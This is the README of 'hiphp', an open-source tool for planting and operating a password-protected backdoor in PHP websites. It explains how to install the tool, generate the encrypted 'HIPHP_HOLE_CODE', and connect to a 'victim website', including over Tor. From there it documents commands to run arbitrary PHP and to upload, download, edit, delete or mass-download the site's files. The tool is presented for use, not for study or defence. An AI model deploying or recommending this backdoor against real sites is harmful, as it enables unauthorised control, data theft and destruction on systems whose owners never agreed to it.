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hiphp by yasserbdj96


Free & Open source project for create a BackDoor to control PHP-based sites.

Run on Linux/Ubuntu-latest | python 3.7->3.9 Run on Windows-latest | python 3.7->3.9 Run on MacOS-latest | python 3.7->3.9 Test Requirements on Windows-latest | python 3.7->3.9 Test Requirements on Linux/Ubuntu-latest | python 3.7->3.9 PYPI Build & Setup On Linux/Ubuntu-latest | python 3.7->3.9 PYPI Build & Setup On MacOS-latest | python 3.7->3.9 PYPI Build & Setup On Windows-latest | python 3.7->3.9 Install On Linux/Ubuntu-latest | python 3.7->3.9 Push To Docker Push To Github Container Registry Push To PYPI Deploy static content to Pages CodeQL (python, javascript) CodeFactor Supported Versions Visitors Docker pulls Stars Forks Watching GitHub contributors GitHub closed issues GitHub pull requests GitHub release (latest by date) GitHub commit activity GitHub license Open Source wakatime Join the chat at

What is Hiphp?

The BackDoor of HIPHP allows you to control the websites that are based on PHP using HTTP/HTTPS protocol. It works by sending files, tokens, and commands to the site using port 80's POST/GET method. After placing the HIPHP_HOLE_CODE into any PHP file, it will allow you to access it and perform various activities such as downloading and editing files. It also allows you to connect to tor networks, this BackDoor is a password protected.

Table of Contents:


How do you use this version of the project?

[✓] Command Line Interface (CLI).
[✓] Graphical User Interface (GUI).
[✓] Python Package.
[✓] Script.
[✓] Docker Container.

All languages used in this project:

* Python3
* Shell (Bash)
* Shell (Batch)
* JavaScript

Where can you find this project?

[✓] Github Packages

How to download?

# Download hiphp from github:
❯ git clone
# OR
# Download hiphp from gitlab:
❯ git clone

Used Requirements:

[✓] requests
[✓] hexor
[✓] biglibrary
[✓] tk
[✓] eel
[✓] readline
[✓] chardet

Supported Distributions:

DistributionVersion CheckPython VersionInstallationhiphp-clihiphp-desktophiphp-tk
UbuntuLast version3.7 --> 3.9
WindwosLast version3.7 --> 3.9
MacOSLast version3.7 --> 3.9
Android-termuxLast version3.7 --> 3.9
NethunterLast version3.7 --> 3.9

Hiphp with Docker:

Docker pull build and run:

# Build:
❯ docker build -t hiphp:latest .

# Run as CLI:
❯ docker run -e KEY="<KEY*>" -e URL="<URL*>" -i -t hiphp:latest

# Run as GUI:
❯ docker run -e DST="True" -d --rm -p -i -t hiphp:latest

# *     = All inputs must be entered.
# KEY   = The password used for encrypt HIPHP_HOLE_CODE.
# URL   = Victim website link.

click to see Demo

Docker Hub pull build and run:

# Pull:
❯ docker pull yasserbdj96/hiphp:latest

# Build:
❯ docker build -t .

# Run as CLI:
❯ docker run -e KEY="<KEY*>" -e URL="<URL*>" -i -t

# Run as GUI:
❯ docker run -e DST="True" -d --rm -p -i -t

# *     = All inputs must be entered.
# KEY   = The password used for encrypt HIPHP_HOLE_CODE.
# URL   = Victim website link.

click to see Demo

GitHub container registry pull build and run:

# Pull:
❯ docker pull

# Build:
❯ docker build -t .

# Run as CLI:
❯ docker run -e KEY="<KEY*>" -e URL="<URL*>" -i -t

# Run as GUI:
❯ docker run -e DST="True" -d --rm -p -i -t

# *     = All inputs must be entered.
# KEY   = The password used for encrypt HIPHP_HOLE_CODE.
# URL   = Victim website link.

click to see Demo


Python Package Installation:

# Install from PYPI:
❯ pip install hiphp
# OR
❯ python -m pip install hiphp

# Local install:
# Download hiphp from github:
❯ git clone
# OR
# Download hiphp from gitlab:
❯ git clone
# Go to downloaded folder:
❯ cd hiphp
# install
❯ pip install -r requirements-pypi.txt
❯ sudo python install

# Uninstall:
❯ pip uninstall hiphp

Ubuntu-Nethunter Installation:

# Download hiphp from github:
❯ git clone
# OR
# Download hiphp from gitlab:
❯ git clone

# Go to downloaded folder:
❯ cd hiphp

# Go to Installation folder:
❯ cd install

# Install:
# If you encounter problems with installation and operation, please repeat the process by giving root permission.
❯ bash -i
❯ hiphp

# Update:
❯ bash -up

# Usage:
#      hiphp [OPTION]
#      hiphp --help                --> hiphp cli help.
#      hiphp --geth [KEY] [URL]    --> Get the HIPHP_HOLE_CODE Encrypted by your [KEY].
#      hiphp [KEY] [URL]           --> Connect to the victim's website (CLI) Mode.
#      hiphp --tk                  --> Run hiphp with 'hiphp-tk' (GUI) Mode.
#      hiphp --dst                 --> Run hiphp with 'hiphp-desktop' (GUI) Mode.
#      hiphp --version             --> Get the version number you are working with.

# Uninstall:
❯ bash -u

Termux Installation:

# Download hiphp from github:
❯ git clone
# OR
# Download hiphp from gitlab:
❯ git clone

# Go to downloaded folder:
❯ cd hiphp

# Go to Installation folder:
❯ cd install

# Install:
❯ bash -ti
❯ hiphp

# Update:
❯ bash -tup

# Usage:
#      hiphp [OPTION]
#      hiphp --help                --> hiphp cli help.
#      hiphp --geth [KEY] [URL]    --> Get the HIPHP_HOLE_CODE Encrypted by your [KEY].
#      hiphp [KEY] [URL]           --> Connect to the victim's website (CLI) Mode.
#      hiphp --version             --> Get the version number you are working with.

# Uninstall:
❯ bash -tu

Run without installation:

Run with hiphp-cli:

# Download hiphp from github:
❯ git clone
# OR
# Download hiphp from gitlab:
❯ git clone

# Go to downloaded folder:
❯ cd hiphp

# install requirements:
❯ pip install -r requirements.txt
❯ pip install -r hiphp-linux/requirements-linux.txt #for linux os.
❯ pip install -r hiphp-win/requirements-win.txt #for windows os.

# default run on any os:
❯ python <KEY> <URL>

# Run with Makefile:
❯ make run arg="cli" url="<URL*>" key="<KEY*>"

# For linux:
❯ cd hiphp-linux
❯ bash "<KEY*>" "<URL*>"

# For Windows:
# Do not forget to modify the "config.ini" file or use the following command:
# > python -c "import sys; open('config.ini','w+').write('python_default_path='+sys.executable)"
# OR Run 'hiphp-win\'.
❯ cd hiphp-win
❯ hiphp-cli.bat "<KEY*>" "<URL*>"

Help for hiphp-cli:
hiphp Commands :
  Command                            Description
  -------                            -----------

  --help, help                       ─> # Display this help.
  --help [ACTIONS], help [ACTIONS]   ─> # Help for a specific command.
  --geth, geth                       ─> # Get the hole Code, "HIPHP_HOLE_CODE" It has the same purpose.
  --phpinfo, phpinfo                 ─> # Some information about the server.
  --cls, cls                         ─> # Clear console.
  --exit, exit                       ─> # Exit this console.


  --ls, ls                           ─> # List information about the FILEs (the current directory by default).
  Usage: --ls [OPTION] [PATH], ls [OPTION] [PATH]
  Mandatory arguments to long options:
    --ls                             ─> # Get a list of all files and folders from the current directory.
    --ls [PATH]                      ─> # Get a list of all files and folders from a specified directory.
    --ls -all                        ─> # Get a list of all files, folders and subfolders from the current directory.
    --ls -all [PATH]                 ─> # Get a list of all files, folders and subfolders from a specified directory.

  --cat, cat                         ─> # Concatenate FILE to standard output.
  Usage: --cat [FILE_PATH]

  --set, set                         ─> # Create a code that is always saved on during work.
  Usage: --set [PHP_CODE]
  You can return the initial value with "--dset" or "dset".

  --cd, cd                           ─> # Change directory.
  Usage: --cd [PATH]

  --rf, rf, run                      ─> # Run code from file.
  Usage: --rf [FILE_PATH] [VARIABLES]
  Mandatory arguments to long options:
    --rf [FILE_PATH]                 ─> # Run code from file.
    --rf [FILE_PATH] [VARIABLES]     ─> # Run code from file with variables, EX: --rf example.php var==hello
  --up, up, upload                   ─> # Upload a file.
  Usage: --up [FILE_PATH] [PATH]
  Mandatory arguments to long options:
    --up [FILE_PATH]                 ─> # Upload a file to the current directory.
    --up [FILE_PATH] [PATH]          ─> # Upload a file to a specified directory.

  --down, down, download             ─> # download a file.
  Usage: --down [-f/-d] [FILE/DIR_PATH] [OUT_PATH]
  Mandatory arguments to long options:
    --down -f [FILE_PATH]            ─> # Download a file to the current directory.
    --down -f [FILE_PATH] [OUT_PATH] ─> # Download file to a specified directory.
    --down -d [DIR_PATH]             ─> # Download a folder to the current directory.
    --down -d [DIR_PATH] [OUT_PATH]  ─> # Download folder to a specified directory.
    --down -all                      ─> # Download all files to the current directory.
    --down -all [OUT_PATH]           ─> # Download all files to a specified directory.

  --zip, zip                         ─> # Compress a directory.
  Usage: --zip [DIR_PATH]
  Mandatory arguments to long options:
    --zip                            ─> # Compress the current directory.
    --zip [DIR_PATH]                 ─> # Compress a specific directory.

  --edt, edt, edit                   ─> # To edit files.
  Usage: --edt [FILE_PATH]
  Mandatory arguments to long options:
    CTRL+q                           ─> # To exit.
    CTRL+s                           ─> # To save.

  --rm, rm, delete                   ─> # To delete files and folders.
  Usage: --rm [-f/-d] [FILE/DIR_PATH]
  Mandatory arguments to long options:
    --rm -f [FILE_PATH]              ─> # Delete a file.
    --rm -d [DIR_PATH]               ─> # Delete a folder.


  --update, update                   ─> # check for updates.
  --license, license                 ─> # This project license.
  --about, about                     ─> # About this project.
  --version, version                 ─> # Get the version number you are working with.

Run with hiphp-desktop:

# Download hiphp from github:
❯ git clone
# OR
# Download hiphp from gitlab:
❯ git clone

# Go to downloaded folder:
❯ cd hiphp

# install requirements:
❯ pip install -r requirements.txt
❯ pip install -r hiphp-desktop/requirements-dst.txt
❯ pip install -r hiphp-linux/requirements-linux.txt #for linux os.
❯ pip install -r hiphp-win/requirements-win.txt #for windows os.

# run with hiphp-desktop tool:
❯ cd hiphp-desktop
❯ python

# Run with Makefile:
❯ make run arg="dst"

# For Linux:
❯ cd hiphp-linux
❯ bash

# For Windows:
# Do not forget to modify the "config.ini" file or use the following command:
# > python -c "import sys; open('config.ini','w+').write('python_default_path='+sys.executable)"
# OR Run 'hiphp-win\'.
❯ cd hiphp-win
❯ run-hiphp-desktop.bat

Run with hiphp-tk:

# Download hiphp from github:
❯ git clone
# OR
# Download hiphp from gitlab:
❯ git clone

# Go to downloaded folder:
❯ cd hiphp

# install requirements:
❯ pip install -r requirements.txt
❯ pip install -r hiphp-tk/requirements-tk.txt
❯ pip install -r hiphp-linux/requirements-linux.txt #for linux os.
❯ pip install -r hiphp-win/requirements-win.txt #for windows os.

# run with hiphp-tk tool:
❯ cd hiphp-tk
❯ python

# Run with Makefile:
❯ make run arg="tk"
# OR
❯ make run arg="tk" url="<URL>" key="<KEY>"

# For Linux:
❯ cd hiphp-linux
❯ bash

# For Windows:
# Do not forget to modify the "config.ini" file or use the following command:
# > python -c "import sys; open('config.ini','w+').write('python_default_path='+sys.executable)"
# OR Run 'hiphp-win\'.
❯ hiphp-win
❯ run-hiphp-tk.bat

Use hiphp As Script:

Script Usage:

# install hiphp package:
# ❯ pip install hiphp

# import hiphp package:
from hiphp import *

# Connect:
p1=hiphp(key="<KEY*>",url="<URL*>",proxies="<PROXIES>",retu=<RETURN>)# Default: retu=False

# *       = All inputs must be entered.
# KEY     = The password used for encrypt HIPHP_HOLE_CODE.
# URL     = Victim website link.
# PROXIES = To use a proxy.
# RETURN  = True for return data as a string, false for print data in the console.

Script Examples:

from hiphp import *

# Connect:
p1=hiphp(key="123",url="")#Default: retu=False, proxies="".
#p1=hiphp(key="123",url="http://kfdjlkgjflkgjdfkjgkfdjgkjdfkgjk.onion/index.php")# If you use hiphp on .onion sites, you must run tor services or tor browser.

# Get the hole Code:
p1.get_hole()# Copy this code into the file whose path you entered earlier. ex: https://localhost/index.php

# Example:1
# Command:"echo 'this is a test';")

# Example:2
# Run code from file:
p1.run_file("./examples.php")# Run code from file.
p1.run_file("./examples.php","var1==true","var2==hiii")# Run code from file With the entry of variables.

# Example:3
# Upload a file:
p1.upload("./examples.php")# Upload a file to the current directory.
p1.upload("./examples.php","./upload_path/")# Upload a file to a specific directory.

# Example:4
# Compress a path:
p1.compress()# Compress the current directory.
p1.compress("./example/")# Compress a specific directory.

# Example:5
# download a file:"")# download a specific file to the current directory."","<OUT_PATH>")# download a specific file to specific directory.

# Example:6
# Command line interface:


hiphp by yasserbdj96


Changelog History:

Click to See changelog History


1. When you use hiphp for the first time on a site, the code HIPHP_HOLE_CODE will show you, copy it and upload it to the path you want to connect to, for example 'https://localhost/inc/example.php'.
2. In order for hiphp to work well and without errors, HIPHP_HOLE_CODE must be placed at the top of the target file.
3. hiphp will not work and it will show you a message stating that you are unable to connect to the site if you do not enter the correct path to the location of HIPHP_HOLE_CODE via the link.
4. If you use hiphp on .onion sites, you must run tor services or tor browser.
5. If you are a Windows user, you must modify the "config.ini" file.

Development By:

Developer / Author: yasserbdj96


The content of this repository is bound by the following LICENSE.


If you like `hiphp` and want to see it improve furthur or want me to create intresting projects , You can buy me a coffee

hiphp by yasserbdj96
BTC: bc1q2dks8w8uurca5xmfwv4jwl7upehyjjakr3xga9

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